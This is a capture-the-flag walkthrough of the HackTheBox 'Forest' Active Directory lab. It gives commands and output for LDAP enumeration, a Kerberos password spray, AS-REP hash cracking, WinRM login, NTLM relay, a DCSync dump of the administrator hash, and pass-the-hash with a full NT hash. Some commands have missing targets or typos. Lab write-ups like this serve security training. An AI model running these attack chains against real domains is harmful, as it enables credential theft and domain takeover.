HTB Forest

Hack the box notes

LDAP 389/TCP - ldapsearch

LDAP normally provides verbose information about the AD. And if anonymous bind is allowed, we can query many of good AD information, such as user information.

Anonymous (NULL) Bind

# ldapsearch null bind
(-x ) simple (anonymous) authentication, otherwise MD5
(-s ) scope
(-b ) basedn .. base domain name

ldapsearch -H ldap:// -x -s base
ldapsearch -H ldap:// -x -b "dc=htb,dc=local"

# Account policy 
 [+] Password Info for Domain: HTB
        [+] Minimum password length: 7
        [+] Account Lockout Threshold: None

# Accounts enumeration
ldapsearch -H ldap:// -x -b DC=htb,DC=local "(objectClass=person)" | grep "sAMAccountName:"
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi

Remote Management Users

ldapsearch -H ldap:// -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"


# install 
git clone
apt-get install libsasl
pip install ldap
pip install python-ldap     
python3 -d htb.local --dc-ip -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at:
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=htb,DC=local
[+] Attempting bind
[+]     ...success! Binded as: 
[+]      None
[+] Enumerating all AD users
[+]     Found 28 users: 
python3 -d htb.local --dc-ip --custom "objectClass=*"

Kerberos - 88/TCP


Brute force and enumerate valid AAD accounts with kerbrute

./kerbrute_linux_amd64 passwordspray -d htb.local --dc ./user.txt 'pass' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/06/23 - Ronnie Flathers @ropnop

2023/06/06 14:15:55 >  Using KDC(s):
2023/06/06 14:15:55 >

2023/06/06 14:15:55 >  [!] svc-alfresco@htb.local:pass - Got AS-REP (no pre-auth) but couldn't decrypt - bad password                                                                                         
2023/06/06 14:15:55 >  [!] lucinda@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] mark@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] andy@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] santi@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] sebastien@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  Done! Tested 6 logins (0 successes) in 0.324 seconds



Identify Kerboros Service Principal Names (SPN) tight to the account using Impacket's GetSPN

# list SPNs tight to account
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName>

# ticket to crack
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName> --request

the response contains kerberos hash which can be cracked offlien with hashcat or john
impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip

# store it into file: svc_hash

Hashcat - Cracking Kerberos ticket

hashcat -m 13100 -a 0 svc_hash passwordlist.txt --force --show

Johne The Ripper - Cracking Kerberos ticket

john --wordlist=/usr/share/wordlists/rockyou.txt ./svc_hash 

Crackmapexec - Test login to account

crackmapexec smb -d htb.local -u svc-alfresco -p s3rvice


WinRM (5985/TCP) — Microsoft implementation of WS-Management protocol. This can allow a remote connection via PowerShell.

Look for remote management user group

ldapsearch -H ldap:// -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"
net rpc group members 'Privileged IT Accounts' -W 'htb.local' -I '' -U'svc-alfresco'%'s3rvice' 2>&1
net rpc group members 'Service Accounts' -W 'htb.local' -I '' -U'svc-alfresco'%'s3rvice' 2>&1


git clone

ruby evil-winrm.rb -i -u svc-alfresco -p s3rvice
net group /domain

Abusing privileges of "Account Operators" see bellow in BloodHound inspection we continue with the privilege escalation by adding new user using DSYNC attack.

DSYNC Attack thhrough - Exchange Trusted Subsystem group

Create domain account

PS C:\> net user bigb0ss bigb0ss /add /domain
PS C:\> net group "Exchange Trusted Subsystem" bigb0ss /add /domain
PS C:\> net user bigb0ss /domain

Impacket NTLM Relay

Impacket’s performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).

# kali terminal1
cd /usr/share/doc/python3-impacket/examples/
./ -t ldap:// --escalate-user bigb0ss

DSYNC attack - Dump Administrator LM/NT hash

# kali terminal2 htb.local/bigb0ss:bigb0ss@ -just-dc-user administrator
# kali terminal2
impacket-secretsdump htb.local/bigb0ss:bigb0ss@ -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up... 

PSEXEC - Login as administrator using hash

impact-psexec htb.local/administrator@ -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

EOF The following BloodHound analysis....

BloodHound Kali - igestor based on impacket

Python based igestor based on impackets

pip install impacter
pip install ldap3
pip install bloodhound

git clone

./ -u svc-alfresco -p s3rvice -d htb.local -ns

BloodHound and Neo4j

Initial setup

apt install bloodhound
apt install neo4j

neo4j console

Start neo4j console and visit first http://localhost:7474 password wizard


./BloodHound --no-sandbox

Import data (upload icon)

Set alfresco as owned

Click on alfresco and chose "Unrolled membership"

We can see the user is part of "Account Operators" group. Members of this group can create and modify most types of accounts.

Go back to DSYNC attack.

Last updated